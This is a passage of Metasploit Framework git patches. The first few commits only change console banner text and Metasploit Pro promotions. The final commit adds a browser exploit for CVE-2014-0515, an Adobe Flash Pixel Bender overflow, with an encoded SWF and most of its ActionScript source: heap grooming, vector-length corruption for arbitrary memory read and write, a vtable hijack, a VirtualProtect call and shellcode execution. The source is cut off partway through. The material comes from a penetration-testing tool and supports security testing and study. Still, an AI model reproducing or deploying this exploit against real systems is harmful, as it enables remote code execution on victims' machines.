a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -397,21 +397,25 @@ class Core banner << "\n\n" end - banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr ]\n" - banner << "+ -- --=[ " - banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post ]\n" - banner << "+ -- --=[ " - oldwarn = nil avdwarn = nil - banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops ]\n" + banner_trailers = { + :version => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr", + :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post", + :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops", + :free_trial => "Free Metasploit Pro trial: http://r-7.com/trymsp" + } + + banner << (" =[ %-57s]\n" % banner_trailers[:version]) + banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:exp_aux_pos]) + banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:pay_enc_nop]) # Direct the user to the 14-day free trial of Metasploit Pro unless # they are on an apt install or already using Metasploit Pro, # Express, or Community edition unless binary_install - banner << "+ -- --=[ 14-Day free trial: http://metasploit.pro ]" + banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:free_trial]) end if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) From 7ed943cead9bb9234881899d04f762dcf5f50e1d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 09:39:39 -0500 Subject: [PATCH 252/853] Add new rotating banners for apt installs --- lib/msf/ui/console/command_dispatcher/core.rb | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index ca6427b7fe..e2d9375558 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -386,12 +386,15 @@ class Core if is_apt content = [ - "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type 'go_pro' to launch it now.", - "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type 'go_pro' to launch it now.", - "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type 'go_pro' to launch it now.", - "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro's wizard -- type 'go_pro' to launch it now.", - "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type 'go_pro' to launch it now.", - "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- type 'go_pro' to launch it now." + "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", + "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", + "Payload caught by AV? Fly under the radar with Dynamic Payloads in\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", + "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", + "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit", + "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- learn more on http://rapid7.com/metasploit", + "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", + "Save 45% of your time on large engagements with Metaspsloit Pro\n-- learn more on http://rapid7.com/metasploit", + "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro\n-- learn more on http://rapid7.com/metasploit" ] banner << content.sample # Ruby 1.9-ism! banner << "\n\n" From ab56583ce0564c24158f255321ce939f1945ffb6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 09:49:41 -0500 Subject: [PATCH 253/853] Remove dead oldwarn code, fix shortlink --- lib/msf/ui/console/command_dispatcher/core.rb | 37 +++---------------- 1 file changed, 5 insertions(+), 32 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e2d9375558..0d52105a28 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -400,38 +400,24 @@ class Core banner << "\n\n" end - oldwarn = nil avdwarn = nil banner_trailers = { :version => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr", :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post", :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops", - :free_trial => "Free Metasploit Pro trial: http://r-7.com/trymsp" + :free_trial => "Free Metasploit Pro trial: http://r-7.co/trymsp" } - banner << (" =[ %-57s]\n" % banner_trailers[:version]) - banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:exp_aux_pos]) - banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:pay_enc_nop]) + banner << (" =[ %-56s]\n" % banner_trailers[:version]) + banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:exp_aux_pos]) + banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:pay_enc_nop]) # Direct the user to the 14-day free trial of Metasploit Pro unless # they are on an apt install or already using Metasploit Pro, # Express, or Community edition unless binary_install - banner << ("+ -- --=[ %-49s]\n" % banner_trailers[:free_trial]) - end - - if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate) - tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d") - banner << " =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n" - if(::Msf::Framework::RepoUpdatedDays > 7) - oldwarn = [] - oldwarn << "Warning: This copy of the Metasploit Framework was last updated #{::Msf::Framework::RepoUpdatedDaysNote}." - oldwarn << " We recommend that you update the framework at least every other day." - oldwarn << " For information on updating your copy of Metasploit, please see:" - oldwarn << " https://community.rapid7.com/docs/DOC-1306" - oldwarn << "" - end + banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:free_trial]) end if ::Msf::Framework::EICARCorrupted @@ -443,22 +429,9 @@ class Core avdwarn << "" end - # We're running a two week survey to gather feedback from users. - # Let's make sure we reach regular msfconsole users. - # TODO: Get rid of this sometime after 2014-01-23 - survey_expires = Time.new(2014,"Jan",22,23,59,59,"-05:00") - if Time.now.to_i < survey_expires.to_i - banner << "+ -- --=[ Answer Q's about Metasploit and win a WiFi Pineapple Mk5 ]\n" - banner << "+ -- --=[ http://bit.ly/msfsurvey (Expires #{survey_expires.ctime}) ]\n" - end - # Display the banner print_line(banner) - if(oldwarn) - oldwarn.map{|line| print_line(line) } - end - if(avdwarn) avdwarn.map{|line| print_error(line) } end From c50c929412a63527ee9611537444603e45aa56e9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 15:59:50 -0500 Subject: [PATCH 254/853] Treat apt and binary installs the same for banners --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 0d52105a28..1eb1da8b1c 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -384,7 +384,7 @@ class Core def cmd_banner(*args) banner = "%cya" + Banner.to_s + "%clr\n\n" - if is_apt + if (is_apt || binary_install) content = [ "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", @@ -416,7 +416,7 @@ class Core # Direct the user to the 14-day free trial of Metasploit Pro unless # they are on an apt install or already using Metasploit Pro, # Express, or Community edition - unless binary_install + unless (is_apt || binary_install) banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:free_trial]) end From eecd05ec74162c370957140f6d4d3711382da40e Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 16:12:15 -0500 Subject: [PATCH 255/853] Fix banner language, padding. --- lib/msf/ui/console/command_dispatcher/core.rb | 27 ++++++++++--------- 1 file changed, 14 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 1eb1da8b1c..d59f853289 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -384,6 +384,8 @@ class Core def cmd_banner(*args) banner = "%cya" + Banner.to_s + "%clr\n\n" + # These messages should /not/ show up when you're on a git checkout; + # you're a developer, so you already know all this. if (is_apt || binary_install) content = [ "Trouble managing data? List, sort, group, tag and search your pentest data\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", @@ -391,10 +393,10 @@ class Core "Payload caught by AV? Fly under the radar with Dynamic Payloads in\nMetasploit Pro -- learn more on http://rapid7.com/metasploit", "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit", - "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\n-- learn more on http://rapid7.com/metasploit", + "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\nLearn more on http://rapid7.com/metasploit", "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", - "Save 45% of your time on large engagements with Metaspsloit Pro\n-- learn more on http://rapid7.com/metasploit", - "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro\n-- learn more on http://rapid7.com/metasploit" + "Save 45% of your time on large engagements with Metaspsloit Pro\nLearn more on http://rapid7.com/metasploit", + "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro -- Learn more on http://rapid7.com/metasploit" ] banner << content.sample # Ruby 1.9-ism! banner << "\n\n" @@ -406,19 +408,18 @@ class Core :version => "%yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr", :exp_aux_pos => "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post", :pay_enc_nop => "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops", - :free_trial => "Free Metasploit Pro trial: http://r-7.co/trymsp" + :free_trial => "Free Metasploit Pro trial: http://r-7.co/trymsp", + :padding => 48 } - banner << (" =[ %-56s]\n" % banner_trailers[:version]) - banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:exp_aux_pos]) - banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:pay_enc_nop]) + banner << (" =[ %-#{banner_trailers[:padding]+8}s]\n" % banner_trailers[:version]) + banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:exp_aux_pos]) + banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:pay_enc_nop]) - # Direct the user to the 14-day free trial of Metasploit Pro unless - # they are on an apt install or already using Metasploit Pro, - # Express, or Community edition - unless (is_apt || binary_install) - banner << ("+ -- --=[ %-48s]\n" % banner_trailers[:free_trial]) - end + # TODO: People who are already on a Pro install shouldn't see this. + # It's hard for Framework to tell the difference though since + # license details are only in Pro -- we can't see them from here. + banner << ("+ -- --=[ %-#{banner_trailers[:padding]}s]\n" % banner_trailers[:free_trial]) if ::Msf::Framework::EICARCorrupted avdwarn = [] From 5fd732d24a61d559bd17ea20a1bfcf583ba025e3 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 7 May 2014 17:13:16 -0500 Subject: [PATCH 256/853] Add module for CVE-2014-0515 --- data/exploits/CVE-2014-0515/Graph.swf | Bin 0 -> 4943 bytes .../source/exploits/CVE-2014-0515/Graph.as | 410 ++++++++++++++++++ .../exploits/CVE-2014-0515/Graph_Shad.as | 10 + .../source/exploits/CVE-2014-0515/binary_data | Bin 0 -> 2425 bytes .../adobe_flash_filters_type_confusion.rb | 1 - .../browser/adobe_flash_pixel_bender_bof.rb | 129 ++++++ 6 files changed, 549 insertions(+), 1 deletion(-) create mode 100755 data/exploits/CVE-2014-0515/Graph.swf create mode 100755 external/source/exploits/CVE-2014-0515/Graph.as create mode 100755 external/source/exploits/CVE-2014-0515/Graph_Shad.as create mode 100755 external/source/exploits/CVE-2014-0515/binary_data create mode 100644 modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb diff --git a/data/exploits/CVE-2014-0515/Graph.swf b/data/exploits/CVE-2014-0515/Graph.swf new file mode 100755 index 0000000000000000000000000000000000000000..aa30c2421e2ed20fe89b98f880289bffe90aae6c GIT binary patch literal 4943 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 NaUZoJ{{zmB|L_W;W}*N9 literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as new file mode 100755 index 0000000000..4982447997 --- /dev/null +++ b/external/source/exploits/CVE-2014-0515/Graph.as @@ -0,0 +1,410 @@ +package { + import flash.display.Sprite; + import flash.utils.ByteArray; + import flash.display.Shader; + import flash.system.Capabilities; + import flash.net.FileReference; + import flash.utils.Endian; + import __AS3__.vec.Vector; + import __AS3__.vec.*; + import flash.display.LoaderInfo; + + public class Graph extends Sprite { + + static var counter:uint = 0; + + protected var Shad:Class; + var shellcode_byte_array:ByteArray; + var aaab:ByteArray; + var shellcodeObj:Array; + + public function Graph(){ + var tweaked_vector:* = undefined; + var tweaked_vector_address:* = undefined; + var shader:Shader; + var flash_memory_protect:Array; + var code_vectors:Array; + var address_code_vector:uint; + var address_shellcode_byte_array:uint; + this.Shad = Graph_Shad; + super(); + shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(","); + var i:* = 0; + var j:* = 0; + + // Just one try + counter++; + if (counter > 1) + { + return; + }; + + // Memory massage + var array_length:uint = 0x10000; + var vector_size:uint = 34; + var array:Array = new Array(); + i = 0; + while (i < array_length) + { + array[i] = new Vector.(1); + i++; + }; + i = 0; + while (i < array_length) + { + array[i] = new Vector.(vector_size); + i++; + }; + i = 0; + while (i < array_length) + { + array[i].length = 0; + i++; + }; + i = 0x0200; + while (i < array_length) + { + array[(i - (2 * (j % 2)))].length = 0x0100; + i = (i + 28); + j++; + }; + + // Overflow and Search for corrupted vector + var corrupted_vector_idx:uint; + var shadba:ByteArray = (new this.Shad() as ByteArray); + shadba.position = 232; + if (Capabilities.os.indexOf("Windows 8") >= 0) + { + shadba.writeUnsignedInt(2472); + }; + shadba.position = 0; + while (1) + { + shader = new Shader(); + try + { + shader.byteCode = (new this.Shad() as ByteArray); + } catch(e) + { + }; + i = 0; + while (i < array_length) + { + if (array[i].length > 0x0100) + { + corrupted_vector_idx = i; + break; + }; + i++; + }; + if (i != array_length) + { + if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break; + }; + array.push(new Vector.(vector_size)); + }; + + // Tweak the vector following the corrupted one + array[corrupted_vector_idx][vector_size] = 0x40000001; + tweaked_vector = array[(corrupted_vector_idx + 1)]; + + // repair the corrupted vector by restoring its + // vector object pointer and length + var vector_obj_addr:* = tweaked_vector[0x3fffffff]; + tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr; + tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size; + i = 0; + var val:uint; + while (true) + { + val = tweaked_vector[(0x40000000 - i)]; + if (val == 0x90001B) break; + i++; + }; + tweaked_vector_address = 0; + if (tweaked_vector[((0x40000000 - i) - 4)] > 0) + { + tweaked_vector[4] = 0x41414141; + tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8); + }; + + // More memory massage, fill an array of FileReference objects + var file_reference_array:Array = new Array(); + i = 0; + while (i < 64) + { + file_reference_array[i] = new FileReference(); + i++; + }; + + var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address); + var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20)); + var do_it:Boolean = true; + var memory_protect_ptr:uint; + var aaaq:uint; + if (do_it) + { + flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address); + memory_protect_ptr = flash_memory_protect[0]; + aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment + code_vectors = this.createCodeVectors(0x45454545, 0x90909090); + address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545); + this.fillCodeVectors(code_vectors); + tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call + tweaked_vector[4] = aaaq; + tweaked_vector[0] = 0x1000; // Length + tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address + + // 10255e21 ff5014 call dword ptr [eax+14h] ds:0023:41414155=???????? + this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8)); + + // 1) Set memory as executable + i = 0; + while (i < 64) + { + file_reference_array[i].cancel(); + i++; + }; + + // 2) Execute shellcode + tweaked_vector[7] = address_code_vector; + i = 0; + while (i < 64) + { + file_reference_array[i].cancel(); + i++; + }; + + // Restore FileReference cancel function pointer + // Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads + this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address); + }; + } + + // returns the integer at memory address + // vector: vector with tweaked length + // vector_address: vector's memory address + // address: memory address to read + function read_memory(vector:Vector., vector_address:uint, address:uint):uint{ + if (address >= vector_address) + { + return (vector[((address - vector_address) / 4)]); + }; + return (vector[(0x40000000 - ((vector_address - address) / 4))]); + } + + function write_memory(vector:Vector., vector_address:uint, address:uint, value:uint){ + if (address >= vector_address) + { + vector[((address - vector_address) / 4)] = value; + } else + { + vector[(0x40000000 - ((vector_address - address) / 4))] = value; + }; + } + + function findFlashMemoryProtect(vector:*, vector_address:*):Array{ + var content:uint; + var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); + var index:uint; + var memory_protect_ptr:uint; + var _local_6:uint; + if (allocation >= vector_address) + { + index = ((allocation - vector_address) / 4); + } else + { + index = (0x40000000 - ((vector_address - allocation) / 4)); + }; + + //push 1 ; 6a 01 + //push dword ptr [eax-8] ; ff 70 f8 + //push dword ptr [eax-4] ; ff 70 fc + //call sub_1059DD00 // Will do VirtualProtect + var offset:uint; + while (1) + { + index--; + content = vector[index]; + if (content == 0xfff870ff) + { + offset = 2; + break; + }; + if (content == 0xf870ff01) + { + offset = 1; + break; + }; + if (content == 0x70ff016a) + { + content = vector[(index + 1)]; + if (content == 0xfc70fff8) + { + offset = 0; + break; + }; + } else + { + if (content == 0x70fff870) + { + offset = 3; + break; + }; + }; + }; + + memory_protect_ptr = ((vector_address + (4 * index)) - offset); + index--; + var content_before:uint = vector[index]; + + if (content_before == 0x16a0424) + { + return ([memory_protect_ptr, _local_6]); + }; + if (content_before == 0x6a042444) + { + return ([memory_protect_ptr, _local_6]); + }; + if (content_before == 0x424448b) + { + return ([memory_protect_ptr, _local_6]); + }; + if (content_before == 0xff016a04) + { + return ([memory_protect_ptr, _local_6]); + }; + _local_6 = (memory_protect_ptr - 6); + + while (1) + { + index--; + content = vector[index]; + if (content == 0x850ff50) + { + if (uint(vector[(index + 1)]) == 0x5e0cc483) + { + offset = 0; + break; + }; + }; + content = (content & 0xFFFFFF00); + if (content == 0x50FF5000) + { + if (uint(vector[(index + 1)]) == 0xcc48308) + { + offset = 1; + break; + }; + }; + content = (content & 0xFFFF0000); + if (content == 0xFF500000) + { + if (uint(vector[(index + 1)]) == 0xc4830850) + { + if (uint(vector[(index + 2)]) == 0xc35d5e0c) + { + offset = 2; + break; + }; + }; + }; + content = (content & 0xFF000000); + if (content == 0x50000000) + { + if (uint(vector[(index + 1)]) == 0x830850ff) + { + if (uint(vector[(index + 2)]) == 0x5d5e0cc4) + { + offset = 3; + break; + }; + }; + }; + }; + memory_protect_ptr = ((vector_address + (4 * index)) + offset); + return ([memory_protect_ptr, _local_6]); + } + + // vector: vector with tweaked length + // address: memory address of vector data + function find_file_ref_vtable(vector:*, address:*):uint{ + var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c)); + + // Find an allocation of size 0x2a0 + var allocation_size:uint; + while (true) + { + allocation_size = this.read_memory(vector, address, (allocation + 8)); + if (allocation_size == 0x2a0) break; + if (allocation_size < 0x2a0) + { + allocation = (allocation + 0x24); // next allocation + } else + { + allocation = (allocation - 0x24); // prior allocation + }; + }; + var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc)); + while (true) + { + if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break; + if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break; + allocation_contents = this.read_memory(vector, address, (allocation_contents + 8)); + }; + return (allocation_contents); + } + + // Returns pointer to the nops in one of the allocated code vectors + function findCodeVector(vector:*, vector_address:*, mark:*):uint{ + var allocation_size:uint; + var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c)); + while (true) + { + allocation_size = this.read_memory(vector, vector_address, (allocation + 8)); + if (allocation_size == 0x7f0) break; // Code Vector found + allocation = (allocation + 0x24); // next allocation + }; + + // allocation contents should be the vector code, search for the mark 0x45454545 + var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc)); + while (true) + { + if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break; + allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation + }; + return ((allocation_contents + 0x2c)); + } + + // create 8 vectors of size 0x7f0 inside an array to place shellcode + function createCodeVectors(mark:uint, nops:uint){ + var code_vectors_array:Array = new Array(); + var i:* = 0; + while (i < 8) + { + code_vectors_array[i] = new Vector.(((0x7f0 / 4) - 8)); // new Vector.(0x1f4) + code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4 + code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4 + i++; + }; + return (code_vectors_array); + } + + + // Fill with the code vectors with the shellcode + function fillCodeVectors(array_code_vectors:Array) { 